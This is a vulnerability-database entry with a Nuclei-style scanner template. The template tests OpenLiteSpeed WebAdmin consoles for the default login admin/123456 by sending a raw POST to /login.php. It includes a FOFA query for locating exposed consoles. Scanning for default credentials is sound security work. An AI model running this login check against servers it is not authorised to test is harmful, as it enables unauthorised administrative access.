漏洞描述
Detected OpenLiteSpeed WebAdmin Console was using default credentials.
openlitespeed-default-login: OpenLiteSpeed WebAdmin - Default Login
PoC代码[已公开]
id: openlitespeed-default-login
info:
name: OpenLiteSpeed WebAdmin - Default Login
author: 0x_Akoko
severity: high
description: |
Detected OpenLiteSpeed WebAdmin Console was using default credentials.
reference:
- https://www.digitalocean.com/community/tutorials/how-to-install-the-openlitespeed-web-server-on-ubuntu-18-04
metadata:
verified: true
max-request: 1
fofa-query: title="OpenLiteSpeed WebAdmin"
tags: default-login,openlitespeed,litespeed,webadmin
variables:
username: "admin"
password: "123456"
http:
- raw:
- |
POST /login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
userid={{username}}&pass={{password}}
matchers:
- type: dsl
dsl:
- 'status_code == 302'
- 'contains_all(header, "LSID", "LSPA", "Location: /index.php")'
condition: and
# digest: 4a0a0047304502210086e3f15499d21f86845420b2b801a30bea4392bbffaaf580b9d2787f532a4054022042c2cb22efc6196bfc12685dbf97e3b0eb4de9a64e9a4a2868ff0214a91e85c3:922c64590222798bb761d5b6d8e72950